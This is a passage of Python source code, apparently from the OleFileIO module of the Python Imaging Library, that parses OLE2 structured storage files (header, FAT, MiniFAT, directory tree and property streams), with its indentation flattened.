Walk through red-black tree of children of this directory entry to add
all of them to the kids list. (recursive method)
child_sid : index of child directory entry to use, or None when called
first time for the root. (only used during recursion)
"""
#[PL] this method was added to use simple recursion instead of a complex
# algorithm.
# if this is not a storage or a leaf of the tree, nothing to do:
if child_sid == NOSTREAM:
return
# check if child SID is in the proper range:
if child_sid<0 or child_sid>=len(self.olefile.direntries):
self.olefile._raise_defect(DEFECT_FATAL, 'OLE DirEntry index out of range')
# get child direntry:
child = self.olefile._load_direntry(child_sid) #direntries[child_sid]
debug('append_kids: child_sid=%d - %s - sid_left=%d, sid_right=%d, sid_child=%d'
% (child.sid, repr(child.name), child.sid_left, child.sid_right, child.sid_child))
# the directory entries are organized as a red-black tree.
# (cf. Wikipedia for details)
# First walk through left side of the tree:
self.append_kids(child.sid_left)
# Check if its name is not already used (case-insensitive):
name_lower = child.name.lower()
if name_lower in self.kids_dict:
self.olefile._raise_defect(DEFECT_INCORRECT,
"Duplicate filename in OLE storage")
# Then the child_sid _OleDirectoryEntry object is appended to the
# kids list and dictionary:
self.kids.append(child)
self.kids_dict[name_lower] = child
# Check if kid was not already referenced in a storage:
if child.used:
self.olefile._raise_defect(DEFECT_INCORRECT,
'OLE Entry referenced more than once')
child.used = True
# Finally walk through right side of the tree:
self.append_kids(child.sid_right)
# Afterwards build kid's own tree if it's also a storage:
child.build_storage_tree()
def __eq__(self, other):
"Compare entries by name"
return self.name == other.name
def __lt__(self, other):
"Compare entries by name"
return self.name < other.name
def __ne__(self, other):
return not self.__eq__(other)
def __le__(self, other):
return self.__eq__(other) or self.__lt__(other)
# Reflected __lt__() and __le__() will be used for __gt__() and __ge__()
#TODO: replace by the same function as MS implementation ?
# (order by name length first, then case-insensitive order)
def dump(self, tab = 0):
"Dump this entry, and all its subentries (for debug purposes only)"
TYPES = ["(invalid)", "(storage)", "(stream)", "(lockbytes)",
"(property)", "(root)"]
print(" "*tab + repr(self.name), TYPES[self.entry_type], end=' ')
if self.entry_type in (STGTY_STREAM, STGTY_ROOT):
print(self.size, "bytes", end=' ')
print()
if self.entry_type in (STGTY_STORAGE, STGTY_ROOT) and self.clsid:
print(" "*tab + "{%s}" % self.clsid)
for kid in self.kids:
kid.dump(tab + 2)
def getmtime(self):
"""
Return modification time of a directory entry.
return: None if modification time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
if self.modifyTime == 0:
return None
return filetime2datetime(self.modifyTime)
def getctime(self):
"""
Return creation time of a directory entry.
return: None if modification time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
if self.createTime == 0:
return None
return filetime2datetime(self.createTime)
#--- OleFileIO ----------------------------------------------------------------
class OleFileIO:
"""
OLE container object
This class encapsulates the interface to an OLE 2 structured
storage file. Use the {@link listdir} and {@link openstream} methods to
access the contents of this file.
Object names are given as a list of strings, one for each subentry
level. The root entry should be omitted. For example, the following
code extracts all image streams from a Microsoft Image Composer file::
ole = OleFileIO("fan.mic")
for entry in ole.listdir():
if entry[1:2] == "Image":
fin = ole.openstream(entry)
fout = open(entry[0:1], "wb")
while True:
s = fin.read(8192)
if not s:
break
fout.write(s)
You can use the viewer application provided with the Python Imaging
Library to view the resulting files (which happens to be standard
TIFF files).
"""
def __init__(self, filename = None, raise_defects=DEFECT_FATAL):
"""
Constructor for OleFileIO class.
filename: file to open.
raise_defects: minimal level for defects to be raised as exceptions.
(use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a
security-oriented application, see source code for details)
"""
# minimal level for defects to be raised as exceptions:
self._raise_defects_level = raise_defects
# list of defects/issues not raised as exceptions:
# tuples of (exception type, message)
self.parsing_issues = []
if filename:
self.open(filename)
def _raise_defect(self, defect_level, message, exception_type=IOError):
"""
This method should be called for any defect found during file parsing.
It may raise an IOError exception according to the minimal level chosen
for the OleFileIO object.
defect_level: defect level, possible values are:
DEFECT_UNSURE : a case which looks weird, but not sure it's a defect
DEFECT_POTENTIAL : a potential defect
DEFECT_INCORRECT : an error according to specifications, but parsing can go on
DEFECT_FATAL : an error which cannot be ignored, parsing is impossible
message: string describing the defect, used with raised exception.
exception_type: exception class to be raised, IOError by default
"""
# added by [PL]
if defect_level >= self._raise_defects_level:
raise exception_type(message)
else:
# just record the issue, no exception raised:
self.parsing_issues.append((exception_type, message))
def open(self, filename):
"""
Open an OLE2 file.
Reads the header, FAT and directory.
filename: string-like or file-like object
"""
#[PL] check if filename is a string-like or file-like object:
# (it is better to check for a read() method)
if hasattr(filename, 'read'):
# file-like object
self.fp = filename
else:
# string-like object: filename of file on disk
#TODO: if larger than 1024 bytes, this could be the actual data => BytesIO
self.fp = open(filename, "rb")
# old code fails if filename is not a plain string:
#if isinstance(filename, (bytes, basestring)):
# self.fp = open(filename, "rb")
#else:
# self.fp = filename
# obtain the filesize by using seek and tell, which should work on most
# file-like objects:
#TODO: do it above, using getsize with filename when possible?
#TODO: fix code to fail with clear exception when filesize cannot be obtained
self.fp.seek(0, os.SEEK_END)
try:
filesize = self.fp.tell()
finally:
self.fp.seek(0)
self._filesize = filesize
# lists of streams in FAT and MiniFAT, to detect duplicate references
# (list of indexes of first sectors of each stream)
self._used_streams_fat = []
self._used_streams_minifat = []
header = self.fp.read(512)
if len(header) != 512 or header[:8] != MAGIC:
self._raise_defect(DEFECT_FATAL, "not an OLE2 structured storage file")
# [PL] header structure according to AAF specifications:
##Header
##struct StructuredStorageHeader { // [offset from start (bytes), length (bytes)]
##BYTE _abSig[8]; // [00H,08] {0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1,
## // 0x1a, 0xe1} for current version
##CLSID _clsid; // [08H,16] reserved must be zero (WriteClassStg/
## // GetClassFile uses root directory class id)
##USHORT _uMinorVersion; // [18H,02] minor version of the format: 33 is
## // written by reference implementation
##USHORT _uDllVersion; // [1AH,02] major version of the dll/format: 3 for
## // 512-byte sectors, 4 for 4 KB sectors
##USHORT _uByteOrder; // [1CH,02] 0xFFFE: indicates Intel byte-ordering
##USHORT _uSectorShift; // [1EH,02] size of sectors in power-of-two;
## // typically 9 indicating 512-byte sectors
##USHORT _uMiniSectorShift; // [20H,02] size of mini-sectors in power-of-two;
## // typically 6 indicating 64-byte mini-sectors
##USHORT _usReserved; // [22H,02] reserved, must be zero
##ULONG _ulReserved1; // [24H,04] reserved, must be zero
##FSINDEX _csectDir; // [28H,04] must be zero for 512-byte sectors,
## // number of SECTs in directory chain for 4 KB
## // sectors
##FSINDEX _csectFat; // [2CH,04] number of SECTs in the FAT chain
##SECT _sectDirStart; // [30H,04] first SECT in the directory chain
##DFSIGNATURE _signature; // [34H,04] signature used for transactions; must
## // be zero. The reference implementation
## // does not support transactions
##ULONG _ulMiniSectorCutoff; // [38H,04] maximum size for a mini stream;
## // typically 4096 bytes
##SECT _sectMiniFatStart; // [3CH,04] first SECT in the MiniFAT chain
##FSINDEX _csectMiniFat; // [40H,04] number of SECTs in the MiniFAT chain
##SECT _sectDifStart; // [44H,04] first SECT in the DIFAT chain
##FSINDEX _csectDif; // [48H,04] number of SECTs in the DIFAT chain
##SECT _sectFat[109]; // [4CH,436] the SECTs of first 109 FAT sectors
##};
# [PL] header decoding:
# '<' indicates little-endian byte ordering for Intel (cf. struct module help)
fmt_header = '<8s16sHHHHHHLLLLLLLLLL'
header_size = struct.calcsize(fmt_header)
debug( "fmt_header size = %d, +FAT = %d" % (header_size, header_size + 109*4) )
header1 = header[:header_size]
(
self.Sig,
self.clsid,
self.MinorVersion,
self.DllVersion,
self.ByteOrder,
self.SectorShift,
self.MiniSectorShift,
self.Reserved, self.Reserved1,
self.csectDir,
self.csectFat,
self.sectDirStart,
self.signature,
self.MiniSectorCutoff,
self.MiniFatStart,
self.csectMiniFat,
self.sectDifStart,
self.csectDif
) = struct.unpack(fmt_header, header1)
debug( struct.unpack(fmt_header, header1))
if self.Sig != MAGIC:
# OLE signature should always be present
self._raise_defect(DEFECT_FATAL, "incorrect OLE signature")
if self.clsid != bytearray(16):
# according to AAF specs, CLSID should always be zero
self._raise_defect(DEFECT_INCORRECT, "incorrect CLSID in OLE header")
debug( "MinorVersion = %d" % self.MinorVersion )
debug( "DllVersion = %d" % self.DllVersion )
if self.DllVersion not in [3, 4]:
# version 3: usual format, 512 bytes per sector
# version 4: large format, 4K per sector
self._raise_defect(DEFECT_INCORRECT, "incorrect DllVersion in OLE header")
debug( "ByteOrder = %X" % self.ByteOrder )
if self.ByteOrder != 0xFFFE:
# For now only common little-endian documents are handled correctly
self._raise_defect(DEFECT_FATAL, "incorrect ByteOrder in OLE header")
# TODO: add big-endian support for documents created on Mac ?
self.SectorSize = 2**self.SectorShift
debug( "SectorSize = %d" % self.SectorSize )
if self.SectorSize not in [512, 4096]:
self._raise_defect(DEFECT_INCORRECT, "incorrect SectorSize in OLE header")
if (self.DllVersion==3 and self.SectorSize!=512) \
or (self.DllVersion==4 and self.SectorSize!=4096):
self._raise_defect(DEFECT_INCORRECT, "SectorSize does not match DllVersion in OLE header")
self.MiniSectorSize = 2**self.MiniSectorShift
debug( "MiniSectorSize = %d" % self.MiniSectorSize )
if self.MiniSectorSize not in [64]:
self._raise_defect(DEFECT_INCORRECT, "incorrect MiniSectorSize in OLE header")
if self.Reserved != 0 or self.Reserved1 != 0:
self._raise_defect(DEFECT_INCORRECT, "incorrect OLE header (non-null reserved bytes)")
debug( "csectDir = %d" % self.csectDir )
if self.SectorSize==512 and self.csectDir!=0:
self._raise_defect(DEFECT_INCORRECT, "incorrect csectDir in OLE header")
debug( "csectFat = %d" % self.csectFat )
debug( "sectDirStart = %X" % self.sectDirStart )
debug( "signature = %d" % self.signature )
# Signature should be zero, BUT some implementations do not follow this
# rule => only a potential defect:
if self.signature != 0:
self._raise_defect(DEFECT_POTENTIAL, "incorrect OLE header (signature>0)")
debug( "MiniSectorCutoff = %d" % self.MiniSectorCutoff )
debug( "MiniFatStart = %X" % self.MiniFatStart )
debug( "csectMiniFat = %d" % self.csectMiniFat )
debug( "sectDifStart = %X" % self.sectDifStart )
debug( "csectDif = %d" % self.csectDif )
# calculate the number of sectors in the file
# (-1 because header doesn't count)
self.nb_sect = ( (filesize + self.SectorSize-1) // self.SectorSize) - 1
debug( "Number of sectors in the file: %d" % self.nb_sect )
# file clsid (probably never used, so we don't store it)
clsid = _clsid(header[8:24])
self.sectorsize = self.SectorSize #1 << i16(header, 30)
self.minisectorsize = self.MiniSectorSize #1 << i16(header, 32)
self.minisectorcutoff = self.MiniSectorCutoff # i32(header, 56)
# check known streams for duplicate references (these are always in FAT,
# never in MiniFAT):
self._check_duplicate_stream(self.sectDirStart)
# check MiniFAT only if it is not empty:
if self.csectMiniFat:
self._check_duplicate_stream(self.MiniFatStart)
# check DIFAT only if it is not empty:
if self.csectDif:
self._check_duplicate_stream(self.sectDifStart)
# Load file allocation tables
self.loadfat(header)
# Load direcory. This sets both the direntries list (ordered by sid)
# and the root (ordered by hierarchy) members.
self.loaddirectory(self.sectDirStart)#i32(header, 48))
self.ministream = None
self.minifatsect = self.MiniFatStart #i32(header, 60)
def close(self):
"""
close the OLE file, to release the file object
"""
self.fp.close()
def _check_duplicate_stream(self, first_sect, minifat=False):
"""
Checks if a stream has not been already referenced elsewhere.
This method should only be called once for each known stream, and only
if stream size is not null.
first_sect: index of first sector of the stream in FAT
minifat: if True, stream is located in the MiniFAT, else in the FAT
"""
if minifat:
debug('_check_duplicate_stream: sect=%d in MiniFAT' % first_sect)
used_streams = self._used_streams_minifat
else:
debug('_check_duplicate_stream: sect=%d in FAT' % first_sect)
# some values can be safely ignored (not a real stream):
if first_sect in (DIFSECT,FATSECT,ENDOFCHAIN,FREESECT):
return
used_streams = self._used_streams_fat
#TODO: would it be more efficient using a dict or hash values, instead
# of a list of long ?
if first_sect in used_streams:
self._raise_defect(DEFECT_INCORRECT, 'Stream referenced twice')
else:
used_streams.append(first_sect)
def dumpfat(self, fat, firstindex=0):
"Displays a part of FAT in human-readable form for debugging purpose"
# [PL] added only for debug
if not DEBUG_MODE:
return
# dictionary to convert special FAT values in human-readable strings
VPL=8 # valeurs par ligne (8+1 * 8+1 = 81)
fatnames = {
FREESECT: "..free..",
ENDOFCHAIN: "[ END. ]",
FATSECT: "FATSECT ",
DIFSECT: "DIFSECT "
}
nbsect = len(fat)
nlines = (nbsect+VPL-1)//VPL
print("index", end=" ")
for i in range(VPL):
print("%8X" % i, end=" ")
print()
for l in range(nlines):
index = l*VPL
print("%8X:" % (firstindex+index), end=" ")
for i in range(index, index+VPL):
if i>=nbsect:
break
sect = fat[i]
if sect in fatnames:
nom = fatnames[sect]
else:
if sect == i+1:
nom = " --->"
else:
nom = "%8X" % sect
print(nom, end=" ")
print()
def dumpsect(self, sector, firstindex=0):
"Displays a sector in a human-readable form, for debugging purpose."
if not DEBUG_MODE:
return
VPL=8 # number of values per line (8+1 * 8+1 = 81)
tab = array.array(UINT32, sector)
nbsect = len(tab)
nlines = (nbsect+VPL-1)//VPL
print("index", end=" ")
for i in range(VPL):
print("%8X" % i, end=" ")
print()
for l in range(nlines):
index = l*VPL
print("%8X:" % (firstindex+index), end=" ")
for i in range(index, index+VPL):
if i>=nbsect:
break
sect = tab[i]
nom = "%8X" % sect
print(nom, end=" ")
print()
def sect2array(self, sect):
"""
convert a sector to an array of 32 bits unsigned integers,
swapping bytes on big endian CPUs such as PowerPC (old Macs)
"""
a = array.array(UINT32, sect)
# if CPU is big endian, swap bytes:
if sys.byteorder == 'big':
a.byteswap()
return a
def loadfat_sect(self, sect):
"""
Adds the indexes of the given sector to the FAT
sect: string containing the first FAT sector, or array of long integers
return: index of last FAT sector.
"""
# a FAT sector is an array of ulong integers.
if isinstance(sect, array.array):
# if sect is already an array it is directly used
fat1 = sect
else:
# if it's a raw sector, it is parsed in an array
fat1 = self.sect2array(sect)
self.dumpsect(sect)
# The FAT is a sector chain starting at the first index of itself.
for isect in fat1:
#print("isect = %X" % isect)
if isect == ENDOFCHAIN or isect == FREESECT:
# the end of the sector chain has been reached
break
# read the FAT sector
s = self.getsect(isect)
# parse it as an array of 32 bits integers, and add it to the
# global FAT array
nextfat = self.sect2array(s)
self.fat = self.fat + nextfat
return isect
def loadfat(self, header):
"""
Load the FAT table.
"""
# The header contains a sector numbers
# for the first 109 FAT sectors. Additional sectors are
# described by DIF blocks
sect = header[76:512]
debug( "len(sect)=%d, so %d integers" % (len(sect), len(sect)//4) )
#fat = []
# [PL] FAT is an array of 32 bits unsigned ints, it's more effective
# to use an array than a list in Python.
# It's initialized as empty first:
self.fat = array.array(UINT32)
self.loadfat_sect(sect)
#self.dumpfat(self.fat)
## for i in range(0, len(sect), 4):
## ix = i32(sect, i)
## #[PL] if ix == -2 or ix == -1: # ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
## if ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
## break
## s = self.getsect(ix)
## #fat = fat + [i32(s, i) for i in range(0, len(s), 4)]
## fat = fat + array.array(UINT32, s)
if self.csectDif != 0:
# [PL] There's a DIFAT because file is larger than 6.8MB
# some checks just in case:
if self.csectFat <= 109:
# there must be at least 109 blocks in header and the rest in
# DIFAT, so number of sectors must be >109.
self._raise_defect(DEFECT_INCORRECT, 'incorrect DIFAT, not enough sectors')
if self.sectDifStart >= self.nb_sect:
# initial DIFAT block index must be valid
self._raise_defect(DEFECT_FATAL, 'incorrect DIFAT, first index out of range')
debug( "DIFAT analysis..." )
# We compute the necessary number of DIFAT sectors :
# (each DIFAT sector = 127 pointers + 1 towards next DIFAT sector)
nb_difat = (self.csectFat-109 + 126)//127
debug( "nb_difat = %d" % nb_difat )
if self.csectDif != nb_difat:
raise IOError('incorrect DIFAT')
isect_difat = self.sectDifStart
for i in iterrange(nb_difat):
debug( "DIFAT block %d, sector %X" % (i, isect_difat) )
#TODO: check if corresponding FAT SID = DIFSECT
sector_difat = self.getsect(isect_difat)
difat = self.sect2array(sector_difat)
self.dumpsect(sector_difat)
self.loadfat_sect(difat[:127])
# last DIFAT pointer is next DIFAT sector:
isect_difat = difat[127]
debug( "next DIFAT sector: %X" % isect_difat )
# checks:
if isect_difat not in [ENDOFCHAIN, FREESECT]:
# last DIFAT pointer value must be ENDOFCHAIN or FREESECT
raise IOError('incorrect end of DIFAT')
## if len(self.fat) != self.csectFat:
## # FAT should contain csectFat blocks
## print("FAT length: %d instead of %d" % (len(self.fat), self.csectFat))
## raise IOError('incorrect DIFAT')
# since FAT is read from fixed-size sectors, it may contain more values
# than the actual number of sectors in the file.
# Keep only the relevant sector indexes:
if len(self.fat) > self.nb_sect:
debug('len(fat)=%d, shrunk to nb_sect=%d' % (len(self.fat), self.nb_sect))
self.fat = self.fat[:self.nb_sect]
debug('\nFAT:')
self.dumpfat(self.fat)
def loadminifat(self):
"""
Load the MiniFAT table.
"""
# MiniFAT is stored in a standard sub-stream, pointed to by a header
# field.
# NOTE: there are two sizes to take into account for this stream:
# 1) Stream size is calculated according to the number of sectors
# declared in the OLE header. This allocated stream may be more than
# needed to store the actual sector indexes.
# (self.csectMiniFat is the number of sectors of size self.SectorSize)
stream_size = self.csectMiniFat * self.SectorSize
# 2) Actually used size is calculated by dividing the MiniStream size
# (given by root entry size) by the size of mini sectors, *4 for
# 32 bits indexes:
nb_minisectors = (self.root.size + self.MiniSectorSize-1) // self.MiniSectorSize
used_size = nb_minisectors * 4
debug('loadminifat(): minifatsect=%d, nb FAT sectors=%d, used_size=%d, stream_size=%d, nb MiniSectors=%d' %
(self.minifatsect, self.csectMiniFat, used_size, stream_size, nb_minisectors))
if used_size > stream_size:
# This is not really a problem, but may indicate a wrong implementation:
self._raise_defect(DEFECT_INCORRECT, 'OLE MiniStream is larger than MiniFAT')
# In any case, first read stream_size:
s = self._open(self.minifatsect, stream_size, force_FAT=True).read()
#[PL] Old code replaced by an array:
#self.minifat = [i32(s, i) for i in range(0, len(s), 4)]
self.minifat = self.sect2array(s)
# Then shrink the array to used size, to avoid indexes out of MiniStream:
debug('MiniFAT shrunk from %d to %d sectors' % (len(self.minifat), nb_minisectors))
self.minifat = self.minifat[:nb_minisectors]
debug('loadminifat(): len=%d' % len(self.minifat))
debug('\nMiniFAT:')
self.dumpfat(self.minifat)
def getsect(self, sect):
"""
Read given sector from file on disk.
sect: sector index
returns a string containing the sector data.
"""
# [PL] this original code was wrong when sectors are 4KB instead of
# 512 bytes:
#self.fp.seek(512 + self.sectorsize * sect)
#[PL]: added safety checks:
#print("getsect(%X)" % sect)
try:
self.fp.seek(self.sectorsize * (sect+1))
except:
debug('getsect(): sect=%X, seek=%d, filesize=%d' %
(sect, self.sectorsize*(sect+1), self._filesize))
self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range')
sector = self.fp.read(self.sectorsize)
if len(sector) != self.sectorsize:
debug('getsect(): sect=%X, read=%d, sectorsize=%d' %
(sect, len(sector), self.sectorsize))
self._raise_defect(DEFECT_FATAL, 'incomplete OLE sector')
return sector
def loaddirectory(self, sect):
"""
Load the directory.
sect: sector index of directory stream.
"""
# The directory is stored in a standard
# substream, independent of its size.
# open directory stream as a read-only file:
# (stream size is not known in advance)
self.directory_fp = self._open(sect)
#[PL] to detect malformed documents and avoid DoS attacks, the maximum
# number of directory entries can be calculated:
max_entries = self.directory_fp.size // 128
debug('loaddirectory: size=%d, max_entries=%d' %
(self.directory_fp.size, max_entries))
# Create list of directory entries
#self.direntries = []
# We start with a list of "None" object
self.direntries = [None] * max_entries
## for sid in iterrange(max_entries):
## entry = fp.read(128)
## if not entry:
## break
## self.direntries.append(_OleDirectoryEntry(entry, sid, self))
# load root entry:
root_entry = self._load_direntry(0)
# Root entry is the first entry:
self.root = self.direntries[0]
# read and build all storage trees, starting from the root:
self.root.build_storage_tree()
def _load_direntry (self, sid):
"""
Load a directory entry from the directory.
This method should only be called once for each storage/stream when
loading the directory.
sid: index of storage/stream in the directory.
return: a _OleDirectoryEntry object
raise: IOError if the entry has always been referenced.
"""
# check if SID is OK:
if sid<0 or sid>=len(self.direntries):
self._raise_defect(DEFECT_FATAL, "OLE directory index out of range")
# check if entry was already referenced:
if self.direntries[sid] is not None:
self._raise_defect(DEFECT_INCORRECT,
"double reference for OLE stream/storage")
# if exception not raised, return the object
return self.direntries[sid]
self.directory_fp.seek(sid * 128)
entry = self.directory_fp.read(128)
self.direntries[sid] = _OleDirectoryEntry(entry, sid, self)
return self.direntries[sid]
def dumpdirectory(self):
"""
Dump directory (for debugging only)
"""
self.root.dump()
def _open(self, start, size = 0x7FFFFFFF, force_FAT=False):
"""
Open a stream, either in FAT or MiniFAT according to its size.
(openstream helper)
start: index of first sector
size: size of stream (or nothing if size is unknown)
force_FAT: if False (default), stream will be opened in FAT or MiniFAT
according to size. If True, it will always be opened in FAT.
"""
debug('OleFileIO.open(): sect=%d, size=%d, force_FAT=%s' %
(start, size, str(force_FAT)))
# stream size is compared to the MiniSectorCutoff threshold:
if size < self.minisectorcutoff and not force_FAT:
# ministream object
if not self.ministream:
# load MiniFAT if it wasn't already done:
self.loadminifat()
# The first sector index of the miniFAT stream is stored in the
# root directory entry:
size_ministream = self.root.size
debug('Opening MiniStream: sect=%d, size=%d' %
(self.root.isectStart, size_ministream))
self.ministream = self._open(self.root.isectStart,
size_ministream, force_FAT=True)
return _OleStream(self.ministream, start, size, 0,
self.minisectorsize, self.minifat,
self.ministream.size)
else:
# standard stream
return _OleStream(self.fp, start, size, 512,
self.sectorsize, self.fat, self._filesize)
def _list(self, files, prefix, node, streams=True, storages=False):
"""
(listdir helper)
files: list of files to fill in
prefix: current location in storage tree (list of names)
node: current node (_OleDirectoryEntry object)
streams: bool, include streams if True (True by default) - new in v0.26
storages: bool, include storages if True (False by default) - new in v0.26
(note: the root storage is never included)
"""
prefix = prefix + [node.name]
for entry in node.kids:
if entry.kids:
# this is a storage
if storages:
# add it to the list
files.append(prefix[1:] + [entry.name])
# check its kids
self._list(files, prefix, entry, streams, storages)
else:
# this is a stream
if streams:
# add it to the list
files.append(prefix[1:] + [entry.name])
def listdir(self, streams=True, storages=False):
"""
Return a list of streams stored in this file
streams: bool, include streams if True (True by default) - new in v0.26
storages: bool, include storages if True (False by default) - new in v0.26
(note: the root storage is never included)
"""
files = []
self._list(files, [], self.root, streams, storages)
return files
def _find(self, filename):
"""
Returns directory entry of given filename. (openstream helper)
Note: this method is case-insensitive.
filename: path of stream in storage tree (except root entry), either:
- a string using Unix path syntax, for example:
'storage_1/storage_1.2/stream'
- a list of storage filenames, path to the desired stream/storage.
Example: ['storage_1', 'storage_1.2', 'stream']
return: sid of requested filename
raise IOError if file not found
"""
# if filename is a string instead of a list, split it on slashes to
# convert to a list:
if isinstance(filename, basestring):
filename = filename.split('/')
# walk across storage tree, following given path:
node = self.root
for name in filename:
for kid in node.kids:
if kid.name.lower() == name.lower():
break
else:
raise IOError("file not found")
node = kid
return node.sid
def openstream(self, filename):
"""
Open a stream as a read-only file object (BytesIO).
filename: path of stream in storage tree (except root entry), either:
- a string using Unix path syntax, for example:
'storage_1/storage_1.2/stream'
- a list of storage filenames, path to the desired stream/storage.
Example: ['storage_1', 'storage_1.2', 'stream']
return: file object (read-only)
raise IOError if filename not found, or if this is not a stream.
"""
sid = self._find(filename)
entry = self.direntries[sid]
if entry.entry_type != STGTY_STREAM:
raise IOError("this file is not a stream")
return self._open(entry.isectStart, entry.size)
def get_type(self, filename):
"""
Test if given filename exists as a stream or a storage in the OLE
container, and return its type.
filename: path of stream in storage tree. (see openstream for syntax)
return: False if object does not exist, its entry type (>0) otherwise:
- STGTY_STREAM: a stream
- STGTY_STORAGE: a storage
- STGTY_ROOT: the root entry
"""
try:
sid = self._find(filename)
entry = self.direntries[sid]
return entry.entry_type
except:
return False
def getmtime(self, filename):
"""
Return modification time of a stream/storage.
filename: path of stream/storage in storage tree. (see openstream for
syntax)
return: None if modification time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
sid = self._find(filename)
entry = self.direntries[sid]
return entry.getmtime()
def getctime(self, filename):
"""
Return creation time of a stream/storage.
filename: path of stream/storage in storage tree. (see openstream for
syntax)
return: None if creation time is null, a python datetime object
otherwise (UTC timezone)
new in version 0.26
"""
sid = self._find(filename)
entry = self.direntries[sid]
return entry.getctime()
def exists(self, filename):
"""
Test if given filename exists as a stream or a storage in the OLE
container.
filename: path of stream in storage tree. (see openstream for syntax)
return: True if object exist, else False.
"""
try:
sid = self._find(filename)
return True
except:
return False
def get_size(self, filename):
"""
Return size of a stream in the OLE container, in bytes.
filename: path of stream in storage tree (see openstream for syntax)
return: size in bytes (long integer)
raise: IOError if file not found, TypeError if this is not a stream.
"""
sid = self._find(filename)
entry = self.direntries[sid]
if entry.entry_type != STGTY_STREAM:
#TODO: Should it return zero instead of raising an exception ?
raise TypeError('object is not an OLE stream')
return entry.size
def get_rootentry_name(self):
"""
Return root entry name. Should usually be 'Root Entry' or 'R' in most
implementations.
"""
return self.root.name
def getproperties(self, filename, convert_time=False, no_conversion=None):
"""
Return properties described in substream.
filename: path of stream in storage tree (see openstream for syntax)
convert_time: bool, if True timestamps will be converted to Python datetime
no_conversion: None or list of int, timestamps not to be converted
(for example total editing time is not a real timestamp)
return: a dictionary of values indexed by id (integer)
"""
# make sure no_conversion is a list, just to simplify code below:
if no_conversion == None:
no_conversion = []
# stream path as a string to report exceptions:
streampath = filename
if not isinstance(streampath, str):
streampath = '/'.join(streampath)
fp = self.openstream(filename)
data = {}
try:
# header
s = fp.read(28)
clsid = _clsid(s[8:24])
# format id
s = fp.read(20)
fmtid = _clsid(s[:16])
fp.seek(i32(s, 16))
# get section
s = b"****" + fp.read(i32(fp.read(4))-4)
# number of properties:
num_props = i32(s, 4)
except BaseException as exc:
# catch exception while parsing property header, and only raise
# a DEFECT_INCORRECT then return an empty dict, because this is not
# a fatal error when parsing the whole file
msg = 'Error while parsing properties header in stream %s: %s' % (
repr(streampath), exc)
self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
return data
for i in range(num_props):
try:
id = 0 # just in case of an exception
id = i32(s, 8+i*8)
offset = i32(s, 12+i*8)
type = i32(s, offset)
debug ('property id=%d: type=%d offset=%X' % (id, type, offset))
# test for common types first (should perhaps use
# a dictionary instead?)
if type == VT_I2: # 16-bit signed integer
value = i16(s, offset+4)
if value >= 32768:
value = value - 65536
elif type == VT_UI2: # 2-byte unsigned integer
value = i16(s, offset+4)
elif type in (VT_I4, VT_INT, VT_ERROR):
# VT_I4: 32-bit signed integer
# VT_ERROR: HRESULT, similar to 32-bit signed integer,
# see http://msdn.microsoft.com/en-us/library/cc230330.aspx
value = i32(s, offset+4)
elif type in (VT_UI4, VT_UINT): # 4-byte unsigned integer
value = i32(s, offset+4) # FIXME
elif type in (VT_BSTR, VT_LPSTR):
# CodePageString, see http://msdn.microsoft.com/en-us/library/dd942354.aspx
# size is a 32 bits integer, including the null terminator, and
# possibly trailing or embedded null chars
#TODO: if codepage is unicode, the string should be converted as such
count = i32(s, offset+4)
value = s[offset+8:offset+8+count-1]
# remove all null chars:
value = value.replace(b'\x00', b'')
elif type == VT_BLOB:
# binary large object (BLOB)
# see http://msdn.microsoft.com/en-us/library/dd942282.aspx
count = i32(s, offset+4)
value = s[offset+8:offset+8+count]
elif type == VT_LPWSTR:
# UnicodeString
# see http://msdn.microsoft.com/en-us/library/dd942313.aspx
# "the string should NOT contain embedded or additional trailing
# null characters."
count = i32(s, offset+4)
value = _unicode(s[offset+8:offset+8+count*2])
elif type == VT_FILETIME:
value = long(i32(s, offset+4)) + (long(i32(s, offset+8))<<32)
# FILETIME is a 64-bit int: "number of 100ns periods
# since Jan 1,1601".
if convert_time and id not in no_conversion:
debug('Converting property #%d to python datetime, value=%d=%fs'
%(id, value, float(value)/10000000))
# convert FILETIME to Python datetime.datetime
# inspired from http://code.activestate.com/recipes/511425-filetime-to-datetime/
_FILETIME_null_date = datetime.datetime(1601, 1, 1, 0, 0, 0)
debug('timedelta days=%d' % (value//(10*1000000*3600*24)))
value = _FILETIME_null_date + datetime.timedelta(microseconds=value//10)
else:
# legacy code kept for backward compatibility: returns a
# number of seconds since Jan 1,1601
value = value // 10000000 # seconds
elif type == VT_UI1: # 1-byte unsigned integer
value = i8(s[offset+4])
elif type == VT_CLSID:
value = _clsid(s[offset+4:offset+20])
elif type == VT_CF:
# PropertyIdentifier or ClipboardData??
# see http://msdn.microsoft.com/en-us/library/dd941945.aspx
count = i32(s, offset+4)
value = s[offset+8:offset+8+count]
elif type == VT_BOOL:
# VARIANT_BOOL, 16 bits bool, 0x0000=Fals, 0xFFFF=True
# see http://msdn.microsoft.com/en-us/library/cc237864.aspx
value = bool(i16(s, offset+4))
else:
value = None # everything else yields "None"
debug ('property id=%d: type=%d not implemented in parser yet' % (id, type))
# missing: VT_EMPTY, VT_NULL, VT_R4, VT_R8, VT_CY, VT_DATE,
# VT_DECIMAL, VT_I1, VT_I8, VT_UI8,
# see http://msdn.microsoft.com/en-us/library/dd942033.aspx
# FIXME: add support for VT_VECTOR
# VT_VECTOR is a 32 uint giving the number of items, followed by
# the items in sequence. The VT_VECTOR value is combined with the
# type of items, e.g. VT_VECTOR|VT_BSTR
# see http://msdn.microsoft.com/en-us/library/dd942011.aspx
#print("%08x" % id, repr(value), end=" ")
#print("(%s)" % VT[i32(s, offset) & 0xFFF])
data[id] = value
except BaseException as exc:
# catch exception while parsing each property, and only raise
# a DEFECT_INCORRECT, because parsing can go on
msg = 'Error while parsing property id %d in stream %s: %s' % (
id, repr(streampath), exc)
self._raise_defect(DEFECT_INCORRECT, msg, type(exc))
return data
def get_metadata(self):
"""
Parse standard properties streams, return an OleMetadata object
containing all the available metadata.
(also stored in the metadata attribute of the OleFileIO object)
new in version 0.25
"""
self.metadata = OleMetadata()
self.metadata.parse_properties(self)
